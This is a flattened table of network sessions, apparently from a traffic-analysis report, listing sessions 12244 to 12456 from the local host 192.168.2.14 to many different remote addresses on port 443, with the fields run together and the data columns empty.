                                                        12244192.168.2.1445722181.34.95.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12245192.168.2.144412864.209.209.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12246192.168.2.1449460216.81.82.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12247192.168.2.1451484149.128.70.219443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12248192.168.2.144083078.210.77.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12249192.168.2.143391069.44.206.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12250192.168.2.144067877.20.223.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12251192.168.2.1440720195.194.217.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12252192.168.2.143597667.0.140.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12253192.168.2.1458810157.159.79.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12254192.168.2.1444422110.26.231.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12255192.168.2.1433416195.154.112.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12256192.168.2.1441858161.205.128.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12257192.168.2.1442114194.169.67.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12258192.168.2.145781219.24.225.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12259192.168.2.1436116119.87.125.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12260192.168.2.145884293.210.132.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12261192.168.2.1448698137.90.208.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12262192.168.2.143975084.54.134.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12263192.168.2.14379305.224.179.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12264192.168.2.144037881.33.60.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12265192.168.2.1436168141.214.33.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12266192.168.2.145791031.55.244.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12267192.168.2.1450550107.50.95.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12268192.168.2.1453600141.151.98.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12269192.168.2.144170032.18.248.232443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12270192.168.2.1439976169.8.251.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12271192.168.2.1441448100.228.38.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12272192.168.2.1443274149.135.51.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12273192.168.2.1443378170.167.81.48443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12274192.168.2.1441846132.115.116.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12275192.168.2.145752863.166.138.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12276192.168.2.1456744129.168.241.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12277192.168.2.1460648152.150.238.110443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12278192.168.2.1447332154.174.7.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12279192.168.2.144849257.219.180.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12280192.168.2.1443220181.137.108.75443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12281192.168.2.144240052.238.213.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12282192.168.2.1435080107.61.39.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12283192.168.2.145074277.202.75.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12284192.168.2.145096613.145.140.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12285192.168.2.144670243.167.71.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12286192.168.2.1443674106.227.158.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12287192.168.2.1434912170.193.55.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12288192.168.2.1443330154.1.33.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12289192.168.2.1447092129.230.191.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12290192.168.2.1460874103.201.110.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12291192.168.2.1456078173.194.91.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12292192.168.2.1435914216.7.38.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12293192.168.2.1433296190.173.3.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12294192.168.2.1444800186.252.178.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12295192.168.2.144493852.231.167.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12296192.168.2.144456873.0.82.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12297192.168.2.146024640.114.24.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12298192.168.2.1456338171.153.189.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12299192.168.2.1458726183.205.46.155443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12300192.168.2.145045260.247.76.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12301192.168.2.1439152145.236.42.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12302192.168.2.1454080189.20.212.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12303192.168.2.1458124212.130.188.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12304192.168.2.144370445.251.31.162443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12305192.168.2.1443608118.127.120.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12306192.168.2.1452754193.73.94.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12307192.168.2.145760079.241.126.47443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12308192.168.2.145951437.217.19.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12309192.168.2.145491484.62.24.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12310192.168.2.1436768204.218.118.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12311192.168.2.1460240142.110.200.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12312192.168.2.1442076208.47.111.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12313192.168.2.144238473.31.110.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12314192.168.2.145245441.19.40.149443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12315192.168.2.144830260.44.234.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12316192.168.2.145446481.136.64.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12317192.168.2.143500479.9.184.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12318192.168.2.1439224105.251.134.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12319192.168.2.1457568158.216.85.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12320192.168.2.1450968132.161.186.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12321192.168.2.1440328143.137.57.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12322192.168.2.1434210118.68.143.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12323192.168.2.1440754200.95.191.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12324192.168.2.1454198146.176.45.216443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12325192.168.2.1460090121.52.121.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12326192.168.2.145614495.206.94.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12327192.168.2.1442456173.149.196.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12328192.168.2.144779669.20.6.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12329192.168.2.145139286.163.61.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12330192.168.2.143342637.233.79.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12331192.168.2.143588676.196.47.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12332192.168.2.1451958109.56.218.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12333192.168.2.1442218141.95.152.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12334192.168.2.145536249.126.57.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12335192.168.2.14432925.193.60.140443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12336192.168.2.14450622.35.27.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12337192.168.2.1438006106.105.174.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12338192.168.2.1439918223.185.50.95443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12339192.168.2.143457851.10.26.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12340192.168.2.1439724197.245.125.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12341192.168.2.144207479.213.143.81443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12342192.168.2.1452020198.189.167.241443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12343192.168.2.1445512170.165.76.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12344192.168.2.145823446.203.13.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12345192.168.2.14539644.164.32.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12346192.168.2.1448684133.91.205.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12347192.168.2.14565424.161.219.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12348192.168.2.1452852153.167.157.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12349192.168.2.1440698200.52.157.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12350192.168.2.14520101.91.180.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12351192.168.2.145503424.13.52.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12352192.168.2.1434490196.137.34.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12353192.168.2.144247640.63.32.114443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12354192.168.2.1439034223.48.17.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12355192.168.2.145792085.134.168.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12356192.168.2.143763868.221.123.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12357192.168.2.1459740179.137.147.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12358192.168.2.1459658109.147.16.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12359192.168.2.1457750104.44.83.132443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12360192.168.2.145211875.224.54.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12361192.168.2.145916412.161.151.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12362192.168.2.1434822184.251.118.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12363192.168.2.1448502204.231.142.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12364192.168.2.1451388216.203.87.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12365192.168.2.143802453.138.134.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12366192.168.2.1454798217.204.229.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12367192.168.2.1457094169.78.183.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12368192.168.2.145376093.33.207.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12369192.168.2.144749870.167.228.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12370192.168.2.143775034.246.29.126443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12371192.168.2.1439268188.64.145.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12372192.168.2.1436266166.78.143.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12373192.168.2.1458502175.244.102.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12374192.168.2.1446766160.171.131.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12375192.168.2.1440090118.27.231.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12376192.168.2.1442942211.250.147.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12377192.168.2.144478243.71.252.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12378192.168.2.145051292.145.121.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12379192.168.2.1439732196.15.197.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12380192.168.2.1440220140.92.46.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12381192.168.2.143486252.229.30.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12382192.168.2.1446284138.61.151.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12383192.168.2.1459718170.88.90.206443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12384192.168.2.146000866.249.8.220443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12385192.168.2.1445570169.163.100.17443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12386192.168.2.146059499.205.229.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12387192.168.2.143514092.198.248.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12388192.168.2.1435550180.140.31.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12389192.168.2.143800246.182.237.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12390192.168.2.1453272104.99.120.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12391192.168.2.1451220198.127.44.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12392192.168.2.1436738182.178.34.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12393192.168.2.1434446209.131.1.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12394192.168.2.1438296137.167.162.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12395192.168.2.145563836.234.204.55443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12396192.168.2.1449208118.124.50.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12397192.168.2.1459734204.224.114.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12398192.168.2.145563077.193.26.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12399192.168.2.1456356116.39.135.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12400192.168.2.1457288178.46.21.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12401192.168.2.1457834141.154.75.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12402192.168.2.143438840.26.136.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12403192.168.2.144225290.193.95.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12404192.168.2.144263251.226.23.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12405192.168.2.1459516131.190.13.16443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12406192.168.2.1448682188.11.49.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12407192.168.2.1442606183.27.34.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12408192.168.2.144729099.139.85.108443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12409192.168.2.145566662.202.117.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12410192.168.2.1453126198.135.22.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12411192.168.2.1447600172.174.252.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12412192.168.2.143777862.218.221.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12413192.168.2.144155858.240.158.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12414192.168.2.144874080.195.112.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12415192.168.2.144832288.86.227.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12416192.168.2.145745224.137.180.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12417192.168.2.144020486.254.229.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12418192.168.2.1460802162.194.12.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12419192.168.2.143332287.194.98.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12420192.168.2.1458442206.36.147.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12421192.168.2.144446043.43.31.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12422192.168.2.14496829.153.85.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12423192.168.2.1449098203.172.250.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12424192.168.2.1453614178.211.81.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12425192.168.2.1458180185.118.38.153443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12426192.168.2.144937686.188.177.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12427192.168.2.145368880.146.174.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12428192.168.2.1435810140.23.40.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12429192.168.2.1448182198.28.3.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12430192.168.2.1456224155.35.176.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12431192.168.2.1444468207.2.230.116443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12432192.168.2.143774436.218.16.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12433192.168.2.1455830193.76.47.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12434192.168.2.1457206184.141.44.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12435192.168.2.1453048186.89.210.85443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12436192.168.2.1453394147.93.190.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12437192.168.2.144305060.31.165.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12438192.168.2.144219691.129.107.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12439192.168.2.145556471.151.18.104443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12440192.168.2.1459698191.223.197.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12441192.168.2.1443728144.144.162.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12442192.168.2.1444086110.218.168.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12443192.168.2.1455016209.113.218.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12444192.168.2.1457454193.121.201.248443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12445192.168.2.1458862196.166.187.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12446192.168.2.1440260100.28.204.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12447192.168.2.1449418158.102.29.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12448192.168.2.143762435.20.157.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12449192.168.2.145238214.237.176.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12450192.168.2.145785063.13.176.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12451192.168.2.1450134142.7.142.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12452192.168.2.1460384209.132.95.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12453192.168.2.1436516115.241.146.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12454192.168.2.1456020138.67.125.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12455192.168.2.1452274168.120.76.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        12456192.168.2.143912675.28.135.51443
